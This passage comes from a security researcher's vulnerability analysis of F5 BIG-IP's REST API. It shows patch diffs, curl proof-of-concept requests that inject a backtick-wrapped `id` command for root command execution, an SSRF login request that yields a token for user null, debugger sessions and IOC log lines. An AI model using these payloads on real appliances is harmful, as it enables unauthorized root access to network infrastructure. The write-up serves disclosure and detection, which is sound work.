Files.<PosixFileAttributes>readAttributes(file1.toPath(), PosixFileAttributes.class, new LinkOption[] { LinkOption.NOFOLLOW_LINKS });\n GroupPrincipal groupPrincipal = posixFileAttributes.group();\n UserPrincipal userPrincipal = posixFileAttributes.owner();\n \n PosixFileAttributeView posixFileAttributeView = Files.<PosixFileAttributeView>getFileAttributeView(file.toPath(), PosixFileAttributeView.class, new LinkOption[] { LinkOption.NOFOLLOW_LINKS });\n posixFileAttributeView.setGroup(groupPrincipal);\n \n Path path = Paths.get(str, new String[0]);\n Files.setOwner(path, userPrincipal);\n \n file.setReadable(true, false);\n } catch (Exception exception) {}\n }\n }\n }\n \n \n protected RestWorker getRestWorker() throws Exception {\n - FileTransferWorker fileTransferWorker = new FileTransferWorker(this.postDirectory, this.tmpDirectory);\n - fileTransferWorker.setPostFileGrooming(false);\n - return (RestWorker)fileTransferWorker;\n + FileTransferPrivateWorker fileTransferPrivateWorker = new FileTransferPrivateWorker(this.postDirectory, this.tmpDirectory);\n + fileTransferPrivateWorker.setPostFileGrooming(false);\n + return (RestWorker)fileTransferPrivateWorker;\n }\n }\n \n\n## RCE\n\nThis is a post-auth root command injection in a `tar(1)` command.\n\n### Patch\n\nFiltering is applied to the user-controlled `taskState.filePath` parameter.\n \n \n [snip]\n + private static final Pattern validFilePathChars = Pattern.compile(\"(^[a-zA-Z][a-zA-Z0-9_.\\\\-\\\\s()]*)\\\\.([tT][aA][rR]\\\\.[gG][zZ])$\");\n [snip]\n private void validateGzipBundle(final IAppBundleInstallTaskState taskState) {\n if (Utilities.isNullOrEmpty(taskState.filePath)) {\n File agcUseCasePackDir = new File(\"/var/apm/f5-iappslx-agc-usecase-pack/\");\n if (!agcUseCasePackDir.exists() || !agcUseCasePackDir.isDirectory()) {\n String error = \"Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.\";\n failTask(taskState, error, \"\");\n return;\n }\n File[] agcUseCasePack = agcUseCasePackDir.listFiles();\n if (agcUseCasePack == null || agcUseCasePack.length == 0 || !agcUseCasePack[0].isFile()) {\n \n String error = \"Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.\";\n failTask(taskState, error, \"\");\n return;\n }\n taskState.filePath = agcUseCasePack[0].getPath();\n }\n \n + String filename = taskState.filePath.substring(taskState.filePath.lastIndexOf('/') + 1);\n + Matcher m = validFilePathChars.matcher(filename);\n + if (!m.matches()) {\n + String errorMessage = String.format(\"Access Guided Configuration use case pack validation failed: the file name %s must begin with alphabet, and only contain letters, numbers, spaces and/or special characters (underscore (_), period (.), hyphen (-) and round brackets ()). Only a .tar.gz file is allowed\", new Object[] { filename });\n +\n +\n +\n + failTask(taskState, errorMessage, \"\");\n +\n + return;\n + }\n final String extractTarCommand = \"tar -xf \" + taskState.filePath + \" -O > /dev/null\";\n \n \n ShellExecutor extractTar = new ShellExecutor(extractTarCommand);\n \n CompletionHandler<ShellExecutionResult> executionFinishedHandler = new CompletionHandler<ShellExecutionResult>()\n {\n public void completed(ShellExecutionResult extractQueryResult)\n {\n if (extractQueryResult.getExitStatus().intValue() != 0) {\n String error = extractTarCommand + \" failed with exit code=\" + extractQueryResult.getExitStatus();\n \n \n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, \"Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.\", error + \"stdout + stderr=\" + extractQueryResult.getOutput());\n \n \n return;\n }\n \n \n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.QUERY_INSTALLED_RPM;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n public void failed(Exception ex, ShellExecutionResult rpmQueryResult) {\n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, \"Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.\", String.format(\"%s failed\", new Object[] { this.val$extractTarCommand }) + RestHelper.throwableStackToString(ex));\n }\n };\n \n \n \n extractTar.startExecution(executionFinishedHandler);\n }\n [snip]\n \n\n### PoC\n\nThe affected endpoint is `/mgmt/tm/access/bundle-install-tasks`.\n \n \n wvu@kharak:~$ curl -ksu admin:[redacted] https://192.168.123.134/mgmt/tm/access/bundle-install-tasks -d '{\"filePath\":\"`id`\"}' | jq .\n {\n \"filePath\": \"`id`\",\n \"toBeInstalledAppRpmsIndex\": -1,\n \"id\": \"36671f83-d1be-4f5a-a2e6-7f9442a2a76f\",\n \"status\": \"CREATED\",\n \"userReference\": {\n \"link\": \"https://localhost/mgmt/shared/authz/users/admin\"\n },\n \"identityReferences\": [\n {\n \"link\": \"https://localhost/mgmt/shared/authz/users/admin\"\n }\n ],\n \"ownerMachineId\": \"ac2562f0-e41f-4652-ba35-6a2b804b235e\",\n \"generation\": 1,\n \"lastUpdateMicros\": 1615930477819656,\n \"kind\": \"tm:access:bundle-install-tasks:iappbundleinstalltaskstate\",\n \"selfLink\": \"https://localhost/mgmt/tm/access/bundle-install-tasks/36671f83-d1be-4f5a-a2e6-7f9442a2a76f\"\n }\n wvu@kharak:~$\n \n\nThe `id(1)` command is executed as root.\n \n \n [pid 64748] execve(\"/bin/tar\", [\"tar\", \"-xf\", \"uid=0(root)\", \"gid=0(root)\", \"groups=0(root)\", \"context=system_u:system_r:initrc_t:s0\", \"-O\"], [/* 9 vars */]) = 0\n \n\n### IOCs\n\nAn error may be seen in `/var/log/restjavad.0.log`. This log file is rotated.\n \n \n [SEVERE][10029][16 Mar 2021 21:34:37 UTC][8100/tm/access/bundle-install-tasks IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive. error details: tar -xf `id` -O > /dev/null failedorg.apache.commons.exec.ExecuteException: Process exited with an error: 2 (Exit value: 2)\n \tat org.apache.commons.exec.DefaultExecutor.executeInternal(DefaultExecutor.java:404)\n \tat org.apache.commons.exec.DefaultExecutor.access$200(DefaultExecutor.java:48)\n \tat org.apache.commons.exec.DefaultExecutor$1.run(DefaultExecutor.java:200)\n \tat java.lang.Thread.run(Thread.java:748)\n \n\n## SSRF?\n\nApache on port 443 talks to `restjavad` on port 8100, which spawns and talks to `/usr/bin/icrd_child` on an ephemeral port.\n\n### Patch\n\nValidation is applied to the user-controlled `state.loginReference.link` parameter.\n \n \n [snip]\n protected void onPost(final RestOperation request) {\n final String incomingAddress = request.getRemoteSender();\n \n final AuthnWorkerState state = (AuthnWorkerState)request.getTypedBody(AuthnWorkerState.class);\n AuthProviderLoginState loginState = (AuthProviderLoginState)request.getTypedBody(AuthProviderLoginState.class);\n \n \n - if (state.password == null && state.bigipAuthCookie == null) {\n + if (Utilities.isNullOrEmpty(state.password) && Utilities.isNullOrEmpty(state.bigipAuthCookie)) {\n state.bigipAuthCookie = request.getCookie(\"BIGIPAuthCookie\");\n loginState.bigipAuthCookie = state.bigipAuthCookie;\n }\n \n if (incomingAddress != null && incomingAddress != \"Unknown\") {\n loginState.address = incomingAddress;\n }\n \n - if ((state.username == null || state.password == null) && state.bigipAuthCookie == null) {\n + if ((Utilities.isNullOrEmpty(state.username) || Utilities.isNullOrEmpty(state.password)) && Utilities.isNullOrEmpty(state.bigipAuthCookie)) {\n +\n request.setStatusCode(401);\n String msg = String.format(\"username and password must not be null or %s in Cookie header should be used.\", new Object[] { \"BIGIPAuthCookie\" });\n \n request.fail(new SecurityException(msg));\n \n +\n return;\n }\n \n + boolean isAllowedLinks = false;\n +\n +\n +\n +\n +\n +\n +\n + if (state.loginReference != null && state.loginReference.link != null) {\n +\n + for (URI iter : this.subscriptions.keySet()) {\n + if (state.loginReference.link.getPath().equals(iter.getPath())) {\n + isAllowedLinks = true;\n + break;\n + }\n + }\n + if (!isAllowedLinks) {\n + getLogger().severe(\"No login provider found.\");\n + String msg = String.format(\"No login provider found.\", new Object[0]);\n + request.fail(new SecurityException(msg));\n +\n + return;\n + }\n + }\n +\n state.password = null;\n request.setBody(state);\n \n \n \n if (state.loginReference == null) {\n if (state.loginProviderName == null) {\n ExecutorService executorService = Executors.newSingleThreadExecutor();\n Callable<String> callable = new Callable<String>()\n {\n public String call() throws Exception {\n final String[] providerName = { null };\n RestRequestCompletion getAuthSourceTypeCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation response) {\n AuthSourceState sourceState = (AuthSourceState)response.getTypedBody(AuthSourceState.class);\n if (\"local\".equals(sourceState.type)) {\n providerName[0] = \"local\";\n } else {\n providerName[0] = \"tmos\";\n }\n }\n \n \n public void failed(Exception ex, RestOperation response) {\n request.fail(ex);\n }\n };\n \n AuthzHelper.getAuthSource(AuthnWorker.this.getServer(), getAuthSourceTypeCompletion);\n try {\n int remainingSleepTime = 800, numberOfAttempts = 0;\n int multiplier = 1; numberOfAttempts = 1;\n for (; providerName[0] == null;\n multiplier *= 2, numberOfAttempts++) {\n \n TimeUnit.MILLISECONDS.sleep((10 * multiplier));\n remainingSleepTime -= 10 * multiplier;\n if (providerName[0] != null || numberOfAttempts == 5) {\n break;\n }\n }\n \n while (providerName[0] == null) {\n TimeUnit.MILLISECONDS.sleep(50L);\n remainingSleepTime -= 50;\n }\n AuthnWorker.this.getLogger().fine(\"Total Time taken to set the loginProviderName is \" + (800 - remainingSleepTime) + \"ms\");\n } catch (InterruptedException e) {\n AuthnWorker.this.getLogger().severe(\"Error while setting value to loginProviderName when no loginReference and no loginProviderName were given\");\n }\n return providerName[0];\n }\n };\n \n Future<String> future = executorService.submit(callable);\n try {\n state.loginProviderName = future.get(800L, TimeUnit.MILLISECONDS);\n executorService.shutdown();\n } catch (TimeoutException e) {\n getLogger().severe(\"Maximum wait time(800ms) exceeded while getting value of loginProviderName\");\n future.cancel(true);\n if (!executorService.isShutdown()) {\n executorService.shutdown();\n }\n } catch (CancellationException|java.util.concurrent.ExecutionException|InterruptedException e) {\n getLogger().severe(\"Error while getting value of loginProviderName:\" + RestHelper.throwableStackToString(e));\n if (!executorService.isShutdown()) {\n executorService.shutdown();\n }\n }\n getLogger().fineFmt(\"loginProviderName set to %s as default value, based on authentication source type when it was null\", new Object[] { state.loginProviderName });\n }\n \n if (state.loginProviderName != null) {\n if (state.loginProviderName.equals(\"local\")) {\n state.loginReference = new RestReference(makePublicUri(LocalAuthLoginWorker.WORKER_URI_PATH));\n }\n else if (this.loginNameToReferenceMap.containsKey(state.loginProviderName)) {\n state.loginReference = this.loginNameToReferenceMap.get(state.loginProviderName);\n } else {\n request.fail(new IllegalArgumentException(\"loginProviderName is invalid.\"));\n return;\n }\n } else {\n request.fail(new IllegalArgumentException(\"loginProviderName is null.\"));\n \n \n return;\n }\n }\n \n final String failureKey = String.format(\"%s:%s\", new Object[] { (state.username == null) ? state.bigipAuthCookie : state.username, state.loginReference.link });\n \n \n \n LoginFailures failures = this.loginFailureMap.get(failureKey);\n \n if (failures != null && failures.failures >= 5) {\n if (RestHelper.getNowMicrosUtc() - failures.lastFailureMicros < FAILED_ATTEMPTS_TIMEOUT) {\n request.setStatusCode(401);\n request.fail(new SecurityException(\"Maximum number of login attempts exceeded.\"));\n return;\n }\n this.loginFailureMap.remove(failureKey);\n }\n \n \n RestRequestCompletion authCompletion = new RestRequestCompletion()\n {\n \n public void failed(Exception ex, RestOperation operation)\n {\n String loginProviderId = (state.loginProviderName == null) ? state.loginReference.link.toString() : state.loginProviderName;\n \n \n String clientId = (state.username == null) ? (\"Cookie \" + state.bigipAuthCookie) : (\"User \" + state.username);\n \n AuthnWorker.this.getLogger().infoFmt(\"%s failed to login from %s using the %s authentication provider\", new Object[] { clientId, this.val$incomingAddress, loginProviderId });\n \n \n AuthnWorker.LoginFailures failures = (AuthnWorker.LoginFailures)AuthnWorker.this.loginFailureMap.get(failureKey);\n if (failures == null) {\n failures = new AuthnWorker.LoginFailures();\n AuthnWorker.this.loginFailureMap.put(failureKey, failures);\n }\n failures.lastFailureMicros = RestHelper.getNowMicrosUtc();\n failures.failures++;\n \n request.setStatusCode(401);\n \n if (ex.getMessage() == null || ex.getMessage().isEmpty()) {\n request.fail(ex, RestErrorResponse.create().setMessage(\"Unable to login using supplied information. If you are attempting to login with a configured authentication provider it may be unavailable or no longer exist.\"));\n return;\n }\n request.fail(ex);\n }\n \n \n \n \n \n public void completed(RestOperation operation) {\n AuthnWorker.this.loginFailureMap.remove(failureKey);\n \n AuthProviderLoginState loggedIn = (AuthProviderLoginState)operation.getTypedBody(AuthProviderLoginState.class);\n \n \n String authProviderId = loggedIn.authProviderName;\n if (authProviderId == null) {\n authProviderId = (state.loginProviderName == null) ? state.loginReference.link.toString() : state.loginProviderName;\n }\n \n \n AuthnWorker.this.getLogger().finestFmt(\"User %s successfully logged in from %s using the %s authentication provider.\", new Object[] { loggedIn.username, this.val$incomingAddress, authProviderId });\n \n \n \n \n AuthnWorker.generateToken(AuthnWorker.this.getServer(), request, state, loggedIn);\n }\n };\n \n RestOperation checkAuth = RestOperation.create().setBody(loginState).setUri(makeLocalUri(state.loginReference.link)).setCompletion(authCompletion);\n \n \n sendPost(checkAuth);\n }\n [snip]\n \n\nAlso interesting is the defensive programming added to basic auth. I tested this first for auth bypass but wasn\u2019t successful. It is by no means a dead end, since I haven\u2019t actually analyzed the code path yet.\n \n \n [snip]\n - private static boolean setIdentityFromBasicAuth(RestOperation request) {\n +\n +\n + private static boolean setIdentityFromBasicAuth(final RestOperation request, final Runnable runnable) {\n String authHeader = request.getBasicAuthorization();\n if (authHeader == null) {\n return false;\n }\n - AuthzHelper.BasicAuthComponents components = AuthzHelper.decodeBasicAuth(authHeader);\n - request.setIdentityData(components.userName, null, null);\n + final AuthzHelper.BasicAuthComponents components = AuthzHelper.decodeBasicAuth(authHeader);\n +\n +\n +\n +\n +\n + String xForwardedHostHeaderValue = request.getAdditionalHeader(\"X-Forwarded-Host\");\n +\n +\n +\n + if (xForwardedHostHeaderValue == null) {\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + return true;\n + }\n +\n +\n +\n + String[] valueList = xForwardedHostHeaderValue.split(\", \");\n + int valueIdx = (valueList.length > 1) ? (valueList.length - 1) : 0;\n + if (valueList[valueIdx].contains(\"localhost\") || valueList[valueIdx].contains(\"127.0.0.1\")) {\n +\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + return true;\n + }\n +\n +\n + if (!PasswordUtil.isPasswordReset().booleanValue()) {\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + return true;\n + }\n +\n + AuthProviderLoginState loginState = new AuthProviderLoginState();\n + loginState.username = components.userName;\n + loginState.password = components.password;\n + loginState.address = request.getRemoteSender();\n + RestRequestCompletion authCompletion = new RestRequestCompletion()\n + {\n + public void completed(RestOperation subRequest) {\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + }\n +\n +\n + public void failed(Exception ex, RestOperation subRequest) {\n + RestOperationIdentifier.LOGGER.warningFmt(\"Failed to validate %s\", new Object[] { ex.getMessage() });\n + if (ex.getMessage().contains(\"Password expired\")) {\n + request.fail(new SecurityException(ForwarderPassThroughWorker.CHANGE_PASSWORD_NOTIFICATION));\n + }\n + if (runnable != null) {\n + runnable.run();\n + }\n + }\n + };\n +\n + try {\n + RestOperation subRequest = RestOperation.create().setBody(loginState).setUri(UrlHelper.makeLocalUri(new URI(TMOS_AUTH_LOGIN_PROVIDER_WORKER_URI_PATH), null)).setCompletion(authCompletion);\n +\n +\n + RestRequestSender.sendPost(subRequest);\n + } catch (URISyntaxException e) {\n + LOGGER.warningFmt(\"ERROR: URISyntaxEception %s\", new Object[] { e.getMessage() });\n + }\n return true;\n }\n }\n [snip]\n \n\n### PoC\n\nThe affected endpoint is `/mgmt/shared/authn/login`.\n \n \n wvu@kharak:~$ curl -ks https://192.168.123.134/mgmt/shared/authn/login -d '{\"bigipAuthCookie\":\"\",\"loginReference\":{\"link\":\"http://localhost/mgmt/tm/access/bundle-install-tasks\"},\"filePath\":\"`id`\"}' | jq .\n {\n \"code\": 400,\n \"message\": \"request failed with null exception\",\n \"referer\": \"192.168.123.1\",\n \"restOperationId\": 4483409,\n \"kind\": \":resterrorresponse\"\n }\n wvu@kharak:~$\n \n\nThe `filePath` parameter is cleared from the request, rendering the RCE endpoint unusable with the SSRF. **ETA: Other researchers noted this (quickly!) in a [Twitter thread](<https://twitter.com/Smi1eSEC/status/1371754129673052160>), and I have confirmed that their findings match mine.**\n \n \n [pid 70562] execve(\"/bin/tar\", [\"tar\", \"-xvf\", \"/var/apm/f5-iappslx-agc-usecase-pack/f5-iappslx-agc-usecase-pack-7.0-0.0.1481.tar.gz\", \"--directory\", \"/var/config/rest/downloads/\"], [/* 9 vars */]) = 0\n \n\n### IOCs\n\nErrors may be seen in `/var/log/restjavad.0.log`. This log file is rotated. Log level can be adjusted in `/etc/restjavad.log.conf`.\n \n \n [F][11000][16 Mar 2021 21:41:58 UTC][8100/shared/authn/login AuthnWorker] User null successfully logged in from 192.168.123.1 using the http://localhost/mgmt/tm/access/bundle-install-tasks authentication provider.\n [F][11014][16 Mar 2021 21:41:58 UTC][RestOperation] Cleared the request content for key originalRequestBody\n [WARNING][11019][16 Mar 2021 21:41:58 UTC][RestOperation] Unable to generate error body for POST http://localhost:8100/shared/authz/tokens 400: java.util.ConcurrentModificationException\n \tat com.google.gson.internal.LinkedTreeMap$LinkedTreeMapIterator.nextNode(LinkedTreeMap.java:544)\n \tat com.google.gson.internal.LinkedTreeMap$EntrySet$1.next(LinkedTreeMap.java:568)\n \tat com.google.gson.internal.LinkedTreeMap$EntrySet$1.next(LinkedTreeMap.java:566)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2458)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2406)\n \tat com.f5.rest.workers.AuthTokenWorker.addOrUpdateAuthToken(AuthTokenWorker.java:337)\n \tat com.f5.rest.workers.AuthTokenWorker.onPost(AuthTokenWorker.java:291)\n \tat com.f5.rest.common.RestCollectionWorker.callDerivedRestMethod(RestCollectionWorker.java:937)\n \tat com.f5.rest.common.RestWorker.callRestMethodHandler(RestWorker.java:1190)\n \tat com.f5.rest.common.RestServer.processQueuedRequests(RestServer.java:1207)\n \tat com.f5.rest.common.RestServer.access$000(RestServer.java:44)\n \tat com.f5.rest.common.RestServer$1.run(RestServer.java:285)\n \tat java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:473)\n \tat java.util.concurrent.FutureTask.run(FutureTask.java:262)\n \tat java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:178)\n \tat java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:292)\n \tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1152)\n \tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:622)\n \tat java.lang.Thread.run(Thread.java:748)\n \n [F][11023][16 Mar 2021 21:41:58 UTC][RestOperation] Cleared the request content for key originalRequestBody\n [WARNING][11026][16 Mar 2021 21:41:58 UTC][RestOperation] Unable to generate error body for POST http://localhost:8100/shared/authn/login 400: java.util.ConcurrentModificationException\n \tat com.google.gson.internal.LinkedTreeMap$LinkedTreeMapIterator.nextNode(LinkedTreeMap.java:544)\n \tat com.google.gson.internal.LinkedTreeMap$EntrySet$1.next(LinkedTreeMap.java:568)\n \tat com.google.gson.internal.LinkedTreeMap$EntrySet$1.next(LinkedTreeMap.java:566)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2458)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2406)\n \tat com.f5.rest.workers.authn.AuthnWorker$8.failed(AuthnWorker.java:533)\n \tat com.f5.rest.workers.authn.AuthnWorker$8.failed(AuthnWorker.java:529)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2486)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2406)\n \tat com.f5.rest.common.RestWorker$5.failed(RestWorker.java:865)\n \tat com.f5.rest.common.RestWorker$5.failed(RestWorker.java:850)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2486)\n \tat com.f5.rest.common.RestOperation.fail(RestOperation.java:2406)\n \tat com.f5.rest.workers.AuthTokenWorker.addOrUpdateAuthToken(AuthTokenWorker.java:337)\n \tat com.f5.rest.workers.AuthTokenWorker.onPost(AuthTokenWorker.java:291)\n \tat com.f5.rest.common.RestCollectionWorker.callDerivedRestMethod(RestCollectionWorker.java:937)\n \tat com.f5.rest.common.RestWorker.callRestMethodHandler(RestWorker.java:1190)\n \tat com.f5.rest.common.RestServer.processQueuedRequests(RestServer.java:1207)\n \tat com.f5.rest.common.RestServer.access$000(RestServer.java:44)\n \tat com.f5.rest.common.RestServer$1.run(RestServer.java:285)\n \tat java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:473)\n \tat java.util.concurrent.FutureTask.run(FutureTask.java:262)\n \tat java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:178)\n \tat java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:292)\n \tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1152)\n \tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:622)\n \tat java.lang.Thread.run(Thread.java:748)\n \n\nNote the \u201csuccessful\u201d login from user `null`, which indicates token generation was triggered. I decided to pursue this vector after my failure with the RCE endpoint.\n\n## Analysis\n\nThis is what you really came here for. ;)\n\n### Debugging\n\nA long JDB session in which request parameter clearing is demonstrated.\n \n \n Breakpoint hit: \"thread=qtp12784804-16 - /mgmt/shared/authn/login\", com.f5.rest.common.RestOperationIdentifier.setIdentityFromBasicAuth(), line=245 bci=11\n 245 AuthzHelper.BasicAuthComponents components = AuthzHelper.decodeBasicAuth(authHeader);\n \n qtp12784804-16 - /mgmt/shared/authn/login[1] where\n [1] com.f5.rest.common.RestOperationIdentifier.setIdentityFromBasicAuth (RestOperationIdentifier.java:245)\n [2] com.f5.rest.common.RestOperationIdentifier.setIdentityFromAuthenticationData (RestOperationIdentifier.java:52)\n [3] com.f5.rest.app.RestServerServlet$ReadListenerImpl.onAllDataRead (RestServerServlet.java:136)\n [4] org.eclipse.jetty.server.HttpInput.run (HttpInput.java:443)\n [5] org.eclipse.jetty.server.handler.ContextHandler.handle (ContextHandler.java:1,175)\n [6] org.eclipse.jetty.server.HttpChannel.handle (HttpChannel.java:355)\n [7] org.eclipse.jetty.server.HttpChannel.run (HttpChannel.java:262)\n [8] org.eclipse.jetty.util.thread.QueuedThreadPool.runJob (QueuedThreadPool.java:635)\n [9] org.eclipse.jetty.util.thread.QueuedThreadPool$3.run (QueuedThreadPool.java:555)\n [10] java.lang.Thread.run (Thread.java:748)\n qtp12784804-16 - /mgmt/shared/authn/login[1] list\n 241 String authHeader = request.getBasicAuthorization();\n 242 if (authHeader == null) {\n 243 return false;\n 244 }\n 245 => AuthzHelper.BasicAuthComponents components = AuthzHelper.decodeBasicAuth(authHeader);\n 246 request.setIdentityData(components.userName, null, null);\n 247 return true;\n 248 }\n 249 }\n qtp12784804-16 - /mgmt/shared/authn/login[1] print authHeader\n authHeader = \"Og==\"\n qtp12784804-16 - /mgmt/shared/authn/login[1] next\n >\n Step completed: \"thread=qtp12784804-16 - /mgmt/shared/authn/login\", com.f5.rest.common.RestOperationIdentifier.setIdentityFromBasicAuth(), line=246 bci=16\n 246 request.setIdentityData(components.userName, null, null);\n \n qtp12784804-16 - /mgmt/shared/authn/login[1] dump components\n components = {\n userName: null\n password: null\n }\n qtp12784804-16 - /mgmt/shared/authn/login[1] cont\n >\n Breakpoint hit: \"thread=Non-Blocking threadPool_4\", com.f5.rest.workers.authn.AuthnWorker.onPost(), line=341 bci=141\n 341 request.setBody(state);\n \n Non-Blocking threadPool_4[1] where\n [1] com.f5.rest.workers.authn.AuthnWorker.onPost (AuthnWorker.java:341)\n [2] com.f5.rest.common.RestWorker.callDerivedRestMethod (RestWorker.java:1,276)\n [3] com.f5.rest.common.RestWorker.callRestMethodHandler (RestWorker.java:1,190)\n [4] com.f5.rest.common.RestServer.processQueuedRequests (RestServer.java:1,207)\n [5] com.f5.rest.common.RestServer.access$000 (RestServer.java:44)\n [6] com.f5.rest.common.RestServer$1.run (RestServer.java:285)\n [7] java.util.concurrent.Executors$RunnableAdapter.call (Executors.java:473)\n [8] java.util.concurrent.FutureTask.run (FutureTask.java:262)\n [9] java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201 (ScheduledThreadPoolExecutor.java:178)\n [10] java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run (ScheduledThreadPoolExecutor.java:292)\n [11] java.util.concurrent.ThreadPoolExecutor.runWorker (ThreadPoolExecutor.java:1,152)\n [12] java.util.concurrent.ThreadPoolExecutor$Worker.run (ThreadPoolExecutor.java:622)\n [13] java.lang.Thread.run (Thread.java:748)\n Non-Blocking threadPool_4[1] list\n 337 return;\n 338 }\n 339\n 340 state.password = null;\n 341 => request.setBody(state);\n 342\n 343\n 344\n 345 if (state.loginReference == null) {\n 346 if (state.loginProviderName == null) {\n Non-Blocking threadPool_4[1] print request\n request = \"[\n id=6146169\n referer=192.168.123.1\n uri=http://localhost:8100/shared/authn/login\n method=POST\n statusCode=200\n contentType=application/x-www-form-urlencoded\n contentLength=121\n contentRange=null\n deadline=Tue Mar 16 15:14:01 PDT 2021\n body={\"bigipAuthCookie\":\"\",\"loginReference\":{\"link\":\"http://localhost/mgmt/tm/access/bundle-install-tasks\"},\"filePath\":\"`id`\"}\n forceSocket=false\n isResponse=false\n retriesRemaining=5\n coordinationId=null\n isConnectionCloseRequested=false\n isConnectionKeepAlive=true\n isRestErrorResponseRequired=true\n AdditionalHeadersAsString=\n Request: 'Local-Ip-From-Httpd'='192.168.123.134'\n 'X-Forwarded-Proto'='http'\n 'X-Forwarded-Server'='localhost.localdomain'\n 'X-F5-New-Authtok-Reqd'='false'\n 'X-Forwarded-Host'='192.168.123.134'\n Response:<empty>\n ResponseHeadersTrace=\n X-F5-Config-Api-Status=0]\"\n Non-Blocking threadPool_4[1] next\n >\n Step completed: \"thread=Non-Blocking threadPool_4\", com.f5.rest.workers.authn.AuthnWorker.onPost(), line=345 bci=147\n 345 if (state.loginReference == null) {\n \n Non-Blocking threadPool_4[1] print request\n request = \"[\n id=6146169\n referer=192.168.123.1\n uri=http://localhost:8100/shared/authn/login\n method=POST\n statusCode=200\n contentType=application/json\n contentLength=139\n contentRange=null\n deadline=Tue Mar 16 15:14:01 PDT 2021\n body={\"bigipAuthCookie\":\"\",\"loginReference\":{\"link\":\"http://localhost/mgmt/tm/access/bundle-install-tasks\"},\"generation\":0,\"lastUpdateMicros\":0}\n forceSocket=false\n isResponse=false\n retriesRemaining=5\n coordinationId=null\n isConnectionCloseRequested=false\n isConnectionKeepAlive=true\n isRestErrorResponseRequired=true\n AdditionalHeadersAsString=\n Request: 'Local-Ip-From-Httpd'='192.168.123.134'\n 'X-Forwarded-Proto'='http'\n 'X-Forwarded-Server'='localhost.localdomain'\n 'X-F5-New-Authtok-Reqd'='false'\n 'X-Forwarded-Host'='192.168.123.134'\n Response:<empty>\n ResponseHeadersTrace=\n X-F5-Config-Api-Status=0]\"\n Non-Blocking threadPool_4[1] cont\n >\n Breakpoint hit: \"thread=Non-Blocking threadPool_4\", com.f5.rest.workers.authn.AuthnWorker.onPost(), line=506 bci=600\n 506 sendPost(checkAuth);\n \n Non-Blocking threadPool_4[1] list\n 502\n 503 RestOperation checkAuth = RestOperation.create().setBody(loginState).setUri(makeLocalUri(state.loginReference.link)).setCompletion(authCompletion);\n 504\n 505\n 506 => sendPost(checkAuth);\n 507 }\n 508\n 509\n 510\n 511\n Non-Blocking threadPool_4[1] print checkAuth\n checkAuth = \"[\n id=6146236\n referer=null\n uri=http://localhost:8100/tm/access/bundle-install-tasks\n method=null\n statusCode=200\n contentType=application/json\n contentLength=84\n contentRange=null\n deadline=Tue Mar 16 15:14:47 PDT 2021\n body={\"address\":\"192.168.123.1\",\"bigipAuthCookie\":\"\",\"generation\":0,\"lastUpdateMicros\":0}\n forceSocket=false\n isResponse=false\n retriesRemaining=5\n coordinationId=null\n isConnectionCloseRequested=false\n isConnectionKeepAlive=true\n isRestErrorResponseRequired=true\n AdditionalHeadersAsString=\n Request:<empty> Response:<empty>\n ResponseHeadersTrace=\n X-F5-Config-Api-Status=0]\"\n Non-Blocking threadPool_4[1] cont\n >\n \n\n### Parameter allowlist\n\nAllowed parameters are in the `com.f5.rest.workers.authn.providers.AuthProviderLoginState` class.\n \n \n package com.f5.rest.workers.authn.providers;\n \n import com.f5.rest.common.RestReference;\n import com.f5.rest.common.RestWorkerState;\n import java.util.List;\n \n public class AuthProviderLoginState extends RestWorkerState {\n public String username;\n \n public String password;\n \n public String address;\n \n public String bigipAuthCookie;\n \n public String authProviderName;\n \n public RestReference userReference;\n \n public List<RestReference> groupReferences;\n }\n \n\nThis significantly limits the power of the SSRF, unfortunately. However, the fraudulent token generation should be investigated further. I have yet to find an endpoint that will respond affirmatively to the token generation. **ETA: See the RCE update at the bottom of the page. Rich found a usable endpoint.**\n\n### No password?\n\nI actually found this early on but didn\u2019t document it yet. Local requests to `restjavad` or `/usr/bin/icrd_child` don\u2019t require a password\u2026\n \n \n [root@localhost:NO LICENSE:Standalone] ~ # curl -su admin: -H \"Content-Type: application/json\" http://localhost:8100/mgmt/tm/util/bash -d '{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}' | jq .\n {\n \"kind\": 